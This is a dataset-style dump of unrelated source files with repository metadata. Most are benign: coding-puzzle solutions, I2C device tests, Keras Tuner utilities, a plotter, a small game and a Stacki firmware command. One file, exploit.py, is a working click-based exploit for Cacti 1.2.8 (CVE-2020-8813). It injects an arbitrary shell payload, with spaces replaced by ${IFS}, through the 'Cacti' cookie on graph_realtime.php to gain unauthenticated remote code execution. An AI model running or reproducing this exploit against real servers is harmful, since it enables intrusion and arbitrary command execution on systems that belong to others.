# 問題:textから'ballon'を構成できる数を返せ
# 解法:collections.Counterを用いる
class Solution:
def maxNumberOfBalloons(self, text: str) -> int:
c = collections.Counter(text)
return min(c[s] // n for s, n in collections.Counter("balloon").items())
| 43.375 | 99 | 0.700288 | 187 | 0.478261 | 0 | 0 | 0 | 0 | 0 | 0 | 209 | 0.534527 |
7303f0aa47265452a8086f8bcf4551e8db1e3810 | 7,746 | py | Python | src/Quiet.X.Tests/i2c_test.py | callwyat/Quiet-Firmware | 864c210e44d368a4a683704841067717ebc8ac43 | [
"MIT"
]
| null | null | null | src/Quiet.X.Tests/i2c_test.py | callwyat/Quiet-Firmware | 864c210e44d368a4a683704841067717ebc8ac43 | [
"MIT"
]
| null | null | null | src/Quiet.X.Tests/i2c_test.py | callwyat/Quiet-Firmware | 864c210e44d368a4a683704841067717ebc8ac43 | [
"MIT"
]
| null | null | null | from quiet_coms import find_quiet_ports
from quiet import Quiet
import time
if 'EXIT_ON_FAIL' not in locals():
VERBOSE = True
EXIT_ON_FAIL = True
class QuietI2C(Quiet):
def __init__(self, coms, **kargs) -> None:
Quiet.__init__(self, coms, **kargs)
def raw_write(self, addr: int, data: bytearray):
command = f'IIC:ADDR {addr};WRIT'
self.writeIEEE(command, data)
def raw_read(self, addr: int, readCount: int) -> bytearray:
message = f'IIC:ADDR {addr};READ? {readCount}'
return self.queryIEEE(message)
def register_write(self, address: int, register:int, data: int, dataSize=2):
self.write(f'IIC:ADDR {address};REGI:ADDR {register};RSIZ {dataSize};WRIT {data}')
def register_read(self, address: int, register:int, dataSize=1) -> int:
return self.query_int(f'IIC:ADDR {address};REGI:ADDR {register};RSIZ {dataSize};READ?')
def enable_master_mode(self) -> None:
self.set_and_verify('IIC:MODE', 'MAST')
def disable(self) -> None:
self.set_and_verify('IIC:MODE', 'OFF')
def acknowledged(self) -> bool:
ack = self.query('IIC:ACK?')
return '1' in ack
def _i2c_register_read_test(i: QuietI2C, address:int, register:int, expectation:int):
value = i.register_read(address, register, 2)
if value != expectation:
message = f'Failure at {hex(address)}:{hex(register)}. Expected {hex(expectation)} but read {hex(value)}'
if EXIT_ON_FAIL:
raise Exception()
else:
print(message)
elif VERBOSE:
print(f'REG\t{hex(address)}:{hex(register)} -> {hex(value)}')
def _i2c_register_write_test(i: QuietI2C, address:int, register:int, value:int):
i.register_write(address, register, value, 2)
time.sleep(0.1)
_i2c_register_read_test(i, address, register, value)
def _i2c_raw_write(i: QuietI2C, address:int, data:bytearray):
i.raw_write(address, data)
if VERBOSE:
print(f'RAW\t{hex(address)} -> {str(data)[10:].strip(")")}')
def _i2c_raw_read_test(i: QuietI2C, address:int, expected:bytearray):
response = i.raw_read(address, len(expected))
if response != expected:
message = f'Failure at {hex(address)}. Expected {expected} but read {response}'
if EXIT_ON_FAIL:
raise Exception(message)
else:
print(message)
elif VERBOSE:
print(f'RAW\t{hex(address)} <- {response}')
def _i2c_check_error(i: QuietI2C, error_name: str, expectation: int):
error = i.error()
if error != expectation:
message = f'Failure {error_name}. Expected {hex(expectation)} received {hex(error)}'
if EXIT_ON_FAIL:
raise Exception(message)
else:
print(message)
elif VERBOSE:
print(f'{error_name.ljust(32)} Pass')
def _i2c_check_lower_limit(i: QuietI2C, command:str, low:int, error_name:str, error_code, delay:int=0):
under = low - 1
i.write(f'{command} {under}')
if delay > 0:
time.sleep(delay)
_i2c_check_error(i, f'UNDER {error_name}', error_code if under >= 0 else 0x0110)
i.write(f'{command} {low}')
if delay > 0:
time.sleep(delay)
_i2c_check_error(i, f'LOWER {error_name}', 0x00)
def _i2c_check_upper_limit(i: QuietI2C, command:str, high:int, error_name:str, error_code, delay:int=0):
i.write(f'{command} {high}')
if delay > 0:
time.sleep(delay)
_i2c_check_error(i, f'UPPER {error_name}', 0x00)
i.write(f'{command} {high + 1}')
if delay > 0:
time.sleep(delay)
_i2c_check_error(i, f'OVER {error_name}', error_code)
def _i2c_check_limit(i: QuietI2C, command:str, low:int, high:int, error_name:str, error_code):
_i2c_check_lower_limit(i, command, low, error_name, error_code)
_i2c_check_upper_limit(i, command, high, error_name, error_code)
def _i2c_check_acknowledge(i, expectation:bool):
ack = i.acknowledged()
if ack != expectation:
if ack:
message = f'Failure ACKNOWLEDGED. Expected NO_ACKNOWLEDGED received ACKNOWLEDGED'
else:
message = f'Failure ACKNOWLEDGED. Expected ACKNOWLEDGED received NO_ACKNOWLEDGED'
if EXIT_ON_FAIL:
raise Exception(message)
else:
print(message)
elif VERBOSE:
print(f'{("" if ack else "NO_")}ACKNOWLEDGED'.ljust(32) + ' Pass')
def i2c_test_errors(i: QuietI2C) -> bool:
# Clear Errors
i.error()
# Verify the second hook works
if i.query_int('SYST:ERR?') != 0:
messsage = 'Failure "SYS:ERR?" Command'
if EXIT_ON_FAIL:
raise Exception(messsage)
else:
print(messsage)
elif VERBOSE:
print('IIC:REGI:ERRO? Pass')
i.disable()
_i2c_check_error(i, 'ERROR_NONE', 0x00)
_i2c_check_limit(i, 'IIC:BAUD', 16000, 1000000, 'INVALID_BAUD', 0x0B01)
_i2c_check_limit(i, 'IIC:TIME', 1, 255, 'INVALID_TIMEOUT', 0x0B02)
_i2c_check_limit(i, 'IIC:ADDR', 0, 127, 'INVALID_ADDRESS', 0x0B03)
i.write('IIC:MODE MAS')
_i2c_check_error(i, 'ERROR_INVALID_MODE', 0x0B04)
_i2c_check_limit(i, 'IIC:REGI:RSIZ', 1, 2, 'INVALID_RSIZE', 0x0B20)
_i2c_check_limit(i, 'IIC:REGI:ADDR', 0, 255, 'INVALID_REGISTER_ADDRESS', 0x0B21)
i.write('IIC:REGI:WRIT 1')
_i2c_check_error(i, 'ERROR_DISABLED_WRITE', 0x0B10)
i.query('IIC:REGI:READ?')
i.com.flushInput()
_i2c_check_error(i, 'ERROR_DISABLED_READ', 0x0B11)
i.write('IIC:WRIT #11A')
_i2c_check_error(i, 'ERROR_DISABLED_WRITE', 0x0B10)
i.query('IIC:READ? 2')
_i2c_check_error(i, 'ERROR_DISABLED_READ', 0x0B11)
i.reset()
i.enable_master_mode()
try:
i.write('IIC:ADDR 0x50;REGI:ADDR 0xFF;RSIZ 1')
i.com.flushInput()
_i2c_check_upper_limit(i, 'IIC:REGI:WRIT', 255, 'INVALID_REGISTER_VALUE', 0x0B22, 0.1)
i.write('IIC:WRIT #10')
i.com.flushInput()
time.sleep(0.1)
_i2c_check_error(i, 'I2C_ERROR_INVALID_WRITE_SIZE', 0x0B31)
i.write('IIC:READ? 0')
i.com.flushInput()
time.sleep(0.1)
_i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SIZE', 0x0B32)
i.write('IIC:WRIT #296' + '0123456789ABCDEF' * 6)
i.com.flushInput()
time.sleep(0.1)
_i2c_check_error(i, 'I2C_ERROR_INVALID_WRITE_SIZE', 0x0B31)
i.query('IIC:READ? 96')
i.com.flushInput()
time.sleep(0.1)
_i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SIZE', 0x0B32)
i.write('IIC:READ?')
i.com.flushInput()
_i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SYNTAX', 0x0B33)
i.write('IIC:ADDR 0x10;WRIT #13ABC')
time.sleep(0.1)
_i2c_check_acknowledge(i, False)
finally:
i.disable()
def i2c_test(i: QuietI2C) -> bool:
i.reset()
i.enable_master_mode()
try:
_i2c_register_read_test(i, 0x50, 0xFE, 0x5449)
_i2c_register_read_test(i, 0x50, 0xFF, 0x1004)
_i2c_register_write_test(i, 0x50, 0x0C, 0x05AA)
_i2c_register_write_test(i, 0x50, 0x08, 0x1E00)
_i2c_register_write_test(i, 0x50, 0x0A, 0x5F80)
_i2c_raw_write(i, 0x50, bytearray([0xFF]))
_i2c_raw_read_test(i, 0x50, bytearray([0x10, 0x04]))
_i2c_raw_write(i, 0x50, bytearray([0x0C, 0x05, 0xA0]))
_i2c_raw_write(i, 0x50, bytearray([0x0C]))
_i2c_raw_read_test(i, 0x50, bytearray([0x05, 0xA0]))
finally:
i.disable()
if __name__ == "__main__":
q2c = QuietI2C(None, log_path='usb_log.txt')
i2c_test(q2c)
i2c_test_errors(q2c)
i2c_test(q2c)
print('All I2C Tests Passed')
| 29.340909 | 113 | 0.631423 | 1,034 | 0.133488 | 0 | 0 | 0 | 0 | 0 | 0 | 1,860 | 0.240124 |
7304d96eed7cd6d1a985ffc90a2d6a94ba9983b7 | 716 | py | Python | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/Overflow/_Data-Structures/binary-tree/binary-tree-tilt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
]
| 5 | 2021-06-02T23:44:25.000Z | 2021-12-27T16:21:57.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/Overflow/_Data-Structures/binary-tree/binary-tree-tilt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
]
| 22 | 2021-05-31T01:33:25.000Z | 2021-10-18T18:32:39.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/Overflow/_Data-Structures/binary-tree/binary-tree-tilt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
]
| 3 | 2021-06-19T03:37:47.000Z | 2021-08-31T00:49:51.000Z | # Source : https://leetcode.com/problems/binary-tree-tilt/description/
# Date : 2017-12-26
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def findTilt(self, root):
"""
:type root: TreeNode
:rtype: int
"""
global ans
ans = 0
self.sumOfNode(root)
return ans
def sumOfNode(self, root):
if root == None:
return 0
left = self.sumOfNode(root.left)
right = self.sumOfNode(root.right)
global ans
ans += abs(left - right)
return left + right + root.val
| 21.058824 | 70 | 0.540503 | 456 | 0.636872 | 0 | 0 | 0 | 0 | 0 | 0 | 311 | 0.434358 |
7305e3962fe9733cd02f16a567ab4d4b8d8a9743 | 7,581 | py | Python | kerastuner/engine/tuner_utils.py | krantirk/keras-tuner | fbc34866bf4e7ff1d60bf8c341a9325b9d5429b3 | [
"Apache-2.0"
]
| 1 | 2019-07-12T17:17:06.000Z | 2019-07-12T17:17:06.000Z | kerastuner/engine/tuner_utils.py | nishantsbi/keras-tuner | fbc34866bf4e7ff1d60bf8c341a9325b9d5429b3 | [
"Apache-2.0"
]
| null | null | null | kerastuner/engine/tuner_utils.py | nishantsbi/keras-tuner | fbc34866bf4e7ff1d60bf8c341a9325b9d5429b3 | [
"Apache-2.0"
]
| 1 | 2020-01-02T04:07:22.000Z | 2020-01-02T04:07:22.000Z | # Copyright 2019 The Keras Tuner Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for Tuner class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
from collections import defaultdict
import numpy as np
import time
import random
import hashlib
import tensorflow as tf
from tensorflow import keras
from ..abstractions import display
class TunerStats(object):
"""Track tuner statistics."""
def __init__(self):
self.num_generated_models = 0 # overall number of instances generated
self.num_invalid_models = 0 # how many models didn't work
self.num_oversized_models = 0 # num models with params> max_params
def summary(self, extended=False):
display.subsection('Tuning stats')
display.display_settings(self.get_config())
def get_config(self):
return {
'num_generated_models': self.num_generated_models,
'num_invalid_models': self.num_invalid_models,
'num_oversized_models': self.num_oversized_models
}
@classmethod
def from_config(cls, config):
stats = cls()
stats.num_generated_models = config['num_generated_models']
stats.num_invalid_models = config['num_invalid_models']
stats.num_oversized_models = config['num_oversized_models']
return stats
def get_max_epochs_and_steps(fit_args, fit_kwargs):
if fit_args:
x = tf.nest.flatten(fit_args)[0]
else:
x = tf.nest.flatten(fit_kwargs.get('x'))[0]
batch_size = fit_kwargs.get('batch_size', 32)
if hasattr(x, '__len__'):
max_steps = math.ceil(float(len(x)) / batch_size)
else:
max_steps = fit_kwargs.get('steps')
max_epochs = fit_kwargs.get('epochs', 1)
return max_epochs, max_steps
class TunerCallback(keras.callbacks.Callback):
def __init__(self, tuner, trial, execution):
self.tuner = tuner
self.trial = trial
self.execution = execution
def on_epoch_begin(self, epoch, logs=None):
self.tuner.on_epoch_begin(
self.execution, self.model, epoch, logs=logs)
def on_batch_begin(self, batch, logs=None):
self.tuner.on_batch_begin(self.execution, self.model, batch, logs)
def on_batch_end(self, batch, logs=None):
self.tuner.on_batch_end(self.execution, self.model, batch, logs)
def on_epoch_end(self, epoch, logs=None):
self.tuner.on_epoch_end(
self.execution, self.model, epoch, logs=logs)
class Display(object):
def __init__(self, host):
self.host = host
self.cpu_usage = []
self.gpu_usage = []
self.batch_history = defaultdict(list)
self.epoch_pbar = None
def on_execution_begin(self, trial, execution, model):
# new model summary
if len(trial.executions) == 1:
display.section('New model')
trial.summary()
# execution info if needed
if trial.max_executions > 1:
display.subsection('Execution %d/%d' %
(len(trial.executions),
trial.max_executions))
def on_trial_end(self,
averaged_metrics,
best_metrics,
objective,
remaining_trials,
max_trials):
# train summary
current = averaged_metrics
best = best_metrics
rows = [['Name', 'Best model', 'Current model']]
for name in best.names:
best_value = round(best.get_best_value(name), 4)
current_value = round(current.get_best_value(name), 4)
row = [name, best_value, current_value]
if name == objective:
if best_value == current_value:
row = display.colorize_row(row, 'green')
else:
row = display.colorize_row(row, 'red')
rows.append(row)
display.display_table(rows)
# Tuning budget exhausted
if remaining_trials < 1:
display.highlight('Hypertuning complete - results in %s' %
self.host.results_dir)
# TODO: final summary
else:
display.highlight('%d/%d trials left' %
(remaining_trials, max_trials))
def on_epoch_begin(self, execution, model, epoch, logs=None):
# reset counters
self.epoch_history = defaultdict(list)
self.gpu_usage = []
self.cpu_usage = []
# epoch bar
self.epoch_pbar = display.progress_bar(
total=execution.max_steps,
leave=True,
unit='steps')
def on_epoch_end(self, execution, model, epoch, logs=None):
# compute stats
final_epoch_postfix = {}
for m, v in logs.items():
final_epoch_postfix[m] = round(v, 4)
# epoch bar
self.epoch_pbar.set_postfix(final_epoch_postfix)
self.epoch_pbar.close()
def on_batch_end(self, execution, model, batch, logs=None):
logs = logs or {}
self.epoch_pbar.update(1)
# computing metric statistics
for k, v in logs.items():
self.batch_history[k].append(v)
avg_metrics = self._avg_metrics(self.batch_history)
self.epoch_pbar.set_postfix(avg_metrics)
# create bar desc with updated statistics
description = ''
host_status = self.host.get_status()
if len(host_status['gpu']):
gpu_usage = [float(gpu['usage']) for gpu in host_status['gpu']]
gpu_usage = int(np.average(gpu_usage))
self.gpu_usage.append(gpu_usage)
description += '[GPU:%3s%%]' % int(np.average(self.gpu_usage))
self.cpu_usage.append(int(host_status['cpu']['usage']))
description += '[CPU:%3s%%]' % int(np.average(self.cpu_usage))
description += 'Epoch %s/%s' % (execution.epochs_seen + 1,
execution.max_epochs)
self.epoch_pbar.set_description(description)
def _avg_metrics(self, metrics):
agg_metrics = {}
for metric_name, values in metrics.items():
if metric_name == 'batch' or metric_name == 'size':
continue
agg_metrics[metric_name] = '%.4f' % np.average(values)
return agg_metrics
def generate_trial_id():
s = str(time.time()) + str(random.randint(1, 1e7))
return hashlib.sha256(s.encode('utf-8')).hexdigest()[:32]
def format_execution_id(i, executions_per_trial):
execution_id_length = math.ceil(
math.log(executions_per_trial, 10))
execution_id_template = '%0' + str(execution_id_length) + 'd'
execution_id = execution_id_template % i
return execution_id
@contextlib.contextmanager
def maybe_distribute(distribution_strategy):
if distribution_strategy is None:
yield
else:
with distribution_strategy.scope():
yield
| 33.544248 | 78 | 0.626962 | 5,570 | 0.734732 | 168 | 0.022161 | 484 | 0.063844 | 0 | 0 | 1,390 | 0.183353 |
7306a719a754d7eb090a7a28857cf9ab3cc30caf | 1,880 | py | Python | plotter.py | ZiegHailo/SMUVI | c324c881c511f1c44e481f93e6bd6fe7f85d4ded | [
"MIT"
]
| null | null | null | plotter.py | ZiegHailo/SMUVI | c324c881c511f1c44e481f93e6bd6fe7f85d4ded | [
"MIT"
]
| null | null | null | plotter.py | ZiegHailo/SMUVI | c324c881c511f1c44e481f93e6bd6fe7f85d4ded | [
"MIT"
]
| null | null | null | __author__ = 'zieghailo'
import matplotlib.pyplot as plt
# plt.ion()
def show():
plt.show()
plt.get_current_fig_manager().full_screen_toggle()
def plot_graph(graph):
# plt.ion()
x = [p.x for p in graph.points]
y = [p.y for p in graph.points]
plt.plot(x, y, 'b*')
plt.draw()
def plot_arrows(graph):
for p in graph.points:
x = p.x
y = p.y
for c in p.connections:
cx = c.x
cy = c.y
# ax.arrow(x, y, cx-x, cy-y)
plt.plot([x, cx], [y, cy], 'k')
plt.draw()
def plot_visited(visited):
x = [p.x for p in visited]
y = [p.y for p in visited]
plt.plot(x, y, 'ro', ms=10)
plt.draw()
def plot_connection(start, end):
plt.plot([start.x, end.x], [start.y, end.y], 'g', linewidth=4)
def start_gui(graph):
fig = plt.figure(1)
ax = fig.add_subplot(111)
ax.set_title('click to build line segments')
ax.axis('equal')
line, = ax.plot([0, 100], [0, 100], 'b.') # empty line
pointbuilder = PointBuilder(line, ax, graph)
fig.waitforbuttonpress(0)
class PointBuilder:
def __init__(self, points, ax, graph):
self.points = points
self.ax = ax
self.graph = graph
self.cid = points.figure.canvas.mpl_connect('button_press_event', self)
self.kid = points.figure.canvas.mpl_connect('key_press_event', self)
def __call__(self, event):
print 'click', event
if event.inaxes!=self.points.axes: return
self.graph.add_point(event.xdata, event.ydata)
x = [p.x for p in self.graph.points]
y = [p.y for p in self.graph.points]
plt.cla()
self.graph.build_graph()
plot_arrows(self.graph)
plot_graph(self.graph)
if event.key != 'x':
plt.waitforbuttonpress(0)
if __name__ == "__main__":
start_gui() | 22.650602 | 79 | 0.579787 | 738 | 0.392553 | 0 | 0 | 0 | 0 | 0 | 0 | 185 | 0.098404 |
7306a81bcc0bef579d78b882fb2bc110b0f6bf5f | 1,506 | py | Python | fannypack/utils/_deprecation.py | brentyi/hfdsajk | 2888aa5d969824ac1e1a528264674ece3f4703f9 | [
"MIT"
]
| 5 | 2020-03-13T21:34:31.000Z | 2020-10-27T15:18:17.000Z | fannypack/utils/_deprecation.py | brentyi/hfdsajk | 2888aa5d969824ac1e1a528264674ece3f4703f9 | [
"MIT"
]
| 2 | 2020-06-17T11:06:56.000Z | 2020-10-25T03:06:18.000Z | fannypack/utils/_deprecation.py | brentyi/hfdsajk | 2888aa5d969824ac1e1a528264674ece3f4703f9 | [
"MIT"
]
| 4 | 2020-03-15T01:55:18.000Z | 2022-01-21T22:06:48.000Z | import warnings
from typing import Callable, Optional, TypeVar, cast
CallableType = TypeVar("CallableType", bound=Callable)
def deprecation_wrapper(message: str, function_or_class: CallableType) -> CallableType:
"""Creates a wrapper for a deprecated function or class. Prints a warning
the first time a function or class is called.
Args:
message (str): Warning message.
function_or_class (CallableType): Function or class to wrap.
Returns:
CallableType: Wrapped function/class.
"""
warned = False
def curried(*args, **kwargs): # pragma: no cover
nonlocal warned
if not warned:
warnings.warn(message, DeprecationWarning, stacklevel=2)
warned = True
return function_or_class(*args, **kwargs)
return cast(CallableType, curried)
def new_name_wrapper(
old_name: str, new_name: str, function_or_class: CallableType
) -> CallableType:
"""Creates a wrapper for a renamed function or class. Prints a warning the first
time a function or class is called with the old name.
Args:
old_name (str): Old name of function or class. Printed in warning.
new_name (str): New name of function or class. Printed in warning.
function_or_class (CallableType): Function or class to wrap.
Returns:
CallableType: Wrapped function/class.
"""
return deprecation_wrapper(
f"{old_name} is deprecated! Use {new_name} instead.", function_or_class
)
| 31.375 | 87 | 0.688579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 831 | 0.551793 |
7307b7da6fb6d2b5a5aa27d12b5f25e31c28bd7c | 319 | py | Python | write/5_json_writer.py | pavlovprojects/python_qa_test_data | 4066f73c83cdd4ace9d6150726a578c0326daf94 | [
"MIT"
]
| null | null | null | write/5_json_writer.py | pavlovprojects/python_qa_test_data | 4066f73c83cdd4ace9d6150726a578c0326daf94 | [
"MIT"
]
| null | null | null | write/5_json_writer.py | pavlovprojects/python_qa_test_data | 4066f73c83cdd4ace9d6150726a578c0326daf94 | [
"MIT"
]
| null | null | null | import json
data = {
"users": [
{"Name": "Dominator", "skill": 100, "gold": 99999, "weapons": ['Sword', 'Atomic Laser']},
{"Name": "Looser", "skill": 1, "gold": -100000, "weapons": [None, None, None]},
]
}
with open("example.json", "w") as f:
s = json.dumps(data, indent=4)
f.write(s)
| 24.538462 | 97 | 0.526646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 120 | 0.376176 |
730824ac4dba3e614be06b76613a0a6b290846f5 | 46 | py | Python | src/utils.py | sequoia-tree/cs370 | 47bf7f56d20bd81abbdbd0502477afcd5f62bbbe | [
"CC-BY-4.0"
]
| 1 | 2019-01-14T08:31:45.000Z | 2019-01-14T08:31:45.000Z | src/utils.py | sequoia-tree/teaching-cs | 47bf7f56d20bd81abbdbd0502477afcd5f62bbbe | [
"CC-BY-4.0"
]
| null | null | null | src/utils.py | sequoia-tree/teaching-cs | 47bf7f56d20bd81abbdbd0502477afcd5f62bbbe | [
"CC-BY-4.0"
]
| null | null | null | from md_utils import *
from py_utils import *
| 15.333333 | 22 | 0.782609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
73085370dd0ae578546e4f06c27e87ad769b743a | 387 | py | Python | practice/ai/machine-learning/digital-camera-day-or-night/digital-camera-day-or-night.py | zeyuanxy/HackerRank | 5194a4af780ece396501c215996685d1be529e73 | [
"MIT"
]
| 4 | 2017-01-18T17:51:58.000Z | 2019-10-20T12:14:37.000Z | practice/ai/machine-learning/digital-camera-day-or-night/digital-camera-day-or-night.py | zeyuanxy/HackerRank | 5194a4af780ece396501c215996685d1be529e73 | [
"MIT"
]
| null | null | null | practice/ai/machine-learning/digital-camera-day-or-night/digital-camera-day-or-night.py | zeyuanxy/HackerRank | 5194a4af780ece396501c215996685d1be529e73 | [
"MIT"
]
| 8 | 2016-03-14T17:16:59.000Z | 2021-06-26T10:11:33.000Z | if __name__ == "__main__":
data = raw_input().strip(',\n').split(' ')
count = 0
total = 0
for pxl in data:
pxl = pxl.split(',')
mean = 0
for i in pxl:
mean += int(i)
mean /= 3
if mean < 70:
count += 1
total += 1
if float(count) / total > 0.4:
print 'night'
else:
print 'day'
| 21.5 | 46 | 0.426357 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 33 | 0.085271 |
73087bd098e88fc78614d997333c9cb2a9e486e2 | 1,231 | py | Python | Mini Projects/RockPaperScissors/RPS.py | Snowystar122/Python-Projects | faf05ec388030b8b40ad7a8ca5c2760fb62cf5a3 | [
"MIT"
]
| null | null | null | Mini Projects/RockPaperScissors/RPS.py | Snowystar122/Python-Projects | faf05ec388030b8b40ad7a8ca5c2760fb62cf5a3 | [
"MIT"
]
| null | null | null | Mini Projects/RockPaperScissors/RPS.py | Snowystar122/Python-Projects | faf05ec388030b8b40ad7a8ca5c2760fb62cf5a3 | [
"MIT"
]
| null | null | null | import random as r
# Sets up required variables
running = True
user_wins = 0
comp_wins = 0
answers = ["R", "P", "S"]
win_combos = ["PR", "RS", "SP"]
# Welcome message
print("Welcome to Rock-Paper-Scissors. Please input one of the following:"
"\n'R' - rock\n'P' - paper\n'S' - scissors\nto get started.")
while running:
# Running game of rock, paper, scissors
if user_wins == 3 or comp_wins == 3:
print(f"Game is over. The score was {user_wins}-{comp_wins}. Thanks for playing.")
break
user_guess = input("Guess:").upper()
if user_guess.upper() not in answers:
print("You didn't enter a valid letter.")
break
comp_guess = answers[r.randint(0, 2)]
guess_join = user_guess + comp_guess
if guess_join[0] == guess_join[1]:
print(f"You both guessed {user_guess}!\nThe current score is {user_wins}-{comp_wins}.")
else:
# Checks to see if computer or user has won the round.
if any(guess_join == elem in win_combos for elem in win_combos):
user_wins += 1
print(f"You win! Score is {user_wins}-{comp_wins}.")
else:
comp_wins += 1
print(f"You lose! Score is {user_wins}-{comp_wins}.")
| 32.394737 | 95 | 0.622258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 575 | 0.4671 |
730b2987ac65ae096f7d5f37854abcd28bec2bf9 | 1,147 | py | Python | pybullet-gym/pybulletgym/agents/agents_baselines.py | SmaleZ/vcl_diayn | b2c47a681675b405d2011bc4a43c3914f3af4ecc | [
"MIT"
]
| 2 | 2021-07-12T17:11:35.000Z | 2021-07-13T05:56:30.000Z | pybullet-gym/pybulletgym/agents/agents_baselines.py | SmaleZ/vcl_diayn | b2c47a681675b405d2011bc4a43c3914f3af4ecc | [
"MIT"
]
| null | null | null | pybullet-gym/pybulletgym/agents/agents_baselines.py | SmaleZ/vcl_diayn | b2c47a681675b405d2011bc4a43c3914f3af4ecc | [
"MIT"
]
| null | null | null | from baselines import deepq
def add_opts(parser):
pass
class BaselinesDQNAgent(object):
'''
classdocs
'''
def __init__(self, opts):
self.metadata = {
'discrete_actions': True,
}
self.opts = opts
self.agent = None
def configure(self, observation_space_shape, nb_actions):
pass
def train(self, env, nb_steps, visualize, verbosity):
model = deepq.models.mlp([64])
self.agent = deepq.learn(
env,
q_func=model,
lr=1e-3,
max_timesteps=nb_steps,
buffer_size=50000,
exploration_fraction=0.1,
exploration_final_eps=0.02,
print_freq=10 if verbosity else None,
callback=env.render if visualize else None
)
def test(self, env, nb_episodes, visualize):
episodes = 0
while episodes < nb_episodes:
obs, done = env.reset(), False
episode_rew = 0
while not done:
if visualize:
env.render()
obs, rew, done, _ = env.step(self.agent(obs[None])[0])
episode_rew += rew
print("Episode reward", episode_rew)
episodes += 1
def load_weights(self, load_file):
self.agent = deepq.load(load_file)
def save_weights(self, save_file, overwrite):
self.agent.save(save_file) | 20.854545 | 58 | 0.691369 | 1,087 | 0.94769 | 0 | 0 | 0 | 0 | 0 | 0 | 53 | 0.046207 |
730be722fa533a8220a435fcc4009bd19bbb500f | 1,426 | py | Python | exploit.py | hexcowboy/CVE-2020-8813 | 0229d52f8b5adb63cc6d5bc757850a01a7800b8d | [
"MIT"
]
| null | null | null | exploit.py | hexcowboy/CVE-2020-8813 | 0229d52f8b5adb63cc6d5bc757850a01a7800b8d | [
"MIT"
]
| null | null | null | exploit.py | hexcowboy/CVE-2020-8813 | 0229d52f8b5adb63cc6d5bc757850a01a7800b8d | [
"MIT"
]
| null | null | null | #!/usr/bin/python3
import requests
import click
from rich import inspect
from rich.console import Console
from url_normalize import url_normalize
from urllib.parse import quote
console = Console()
def shell_encode(string):
return string.replace(" ", "${IFS}")
@click.command()
@click.option("-u", "--url", prompt="Target URL", help="The URL of the Cacti installation")
@click.option("-p", "--payload", prompt="Payload", help="The payload that you want to execute on the target")
def exploit(url, payload):
"""Cacti v1.2.8 Unauthenticated Remote Code Execution"""
# Normalize URL input, URL encode the payload
url = url + "/graph_realtime.php?action=init"
url = url_normalize(url, default_scheme="http")
payload = shell_encode(payload)
payload = quote(payload)
cookies = {"Cacti": payload}
# Check if target is vulnerable
try:
with console.status("Checking to see if target is vulnerable"):
request = requests.get(url)
except:
console.print(f'Could not connect to the host, please check the URL again: {url}', style="red")
exit(1)
inspect(request)
if request.status_code == 200:
with console.status("Realtime graph found, sending payload."):
requests.get(url, cookies=cookies)
else:
click.echo("Realtime graph not found. The target may not be vulnerable.")
if __name__ == "__main__":
exploit()
| 31 | 109 | 0.680224 | 0 | 0 | 0 | 0 | 1,114 | 0.781206 | 0 | 0 | 565 | 0.396213 |
730d40eb64f626d437281807fa30ca37ecd18cc5 | 1,119 | py | Python | common/src/stack/command/stack/commands/set/firmware/model/imp/__init__.py | kmcm0/stacki | eb9dff1b45d5725b4986e567876bf61707fec28f | [
"BSD-3-Clause"
]
| 123 | 2015-05-12T23:36:45.000Z | 2017-07-05T23:26:57.000Z | common/src/stack/command/stack/commands/set/firmware/model/imp/__init__.py | kmcm0/stacki | eb9dff1b45d5725b4986e567876bf61707fec28f | [
"BSD-3-Clause"
]
| 177 | 2015-06-05T19:17:47.000Z | 2017-07-07T17:57:24.000Z | common/src/stack/command/stack/commands/set/firmware/model/imp/__init__.py | kmcm0/stacki | eb9dff1b45d5725b4986e567876bf61707fec28f | [
"BSD-3-Clause"
]
| 32 | 2015-06-07T02:25:03.000Z | 2017-06-23T07:35:35.000Z | # @copyright@
# Copyright (c) 2006 - 2019 Teradata
# All rights reserved. Stacki(r) v5.x stacki.com
# https://github.com/Teradata/stacki/blob/master/LICENSE.txt
# @copyright@
#
# @rocks@
# Copyright (c) 2000 - 2010 The Regents of the University of California
# All rights reserved. Rocks(r) v5.4 www.rocksclusters.org
# https://github.com/Teradata/stacki/blob/master/LICENSE-ROCKS.txt
# @rocks@
import stack.commands
class Command(stack.commands.set.firmware.command):
"""
Associates a firmware implementation with one or more models.
<arg type='string' name='models'>
One or more models to associate the implementation with.
</arg>
<param type='string' name='imp'>
The name of the implementation to associate with the provided models.
</param>
<param type='string' name='make'>
The make of the models.
</param>
<example cmd="set firmware model imp m7800 m6036 imp=mellanox_6xxx_7xxx make=mellanox">
Sets the mellanox_6xxx_7xxx implementation as the one to run for the models m7800 and m6036 for make mellanox.
</example>
"""
def run(self, params, args):
self.runPlugins(args = (params, args))
| 29.447368 | 111 | 0.739946 | 699 | 0.624665 | 0 | 0 | 0 | 0 | 0 | 0 | 958 | 0.856122 |
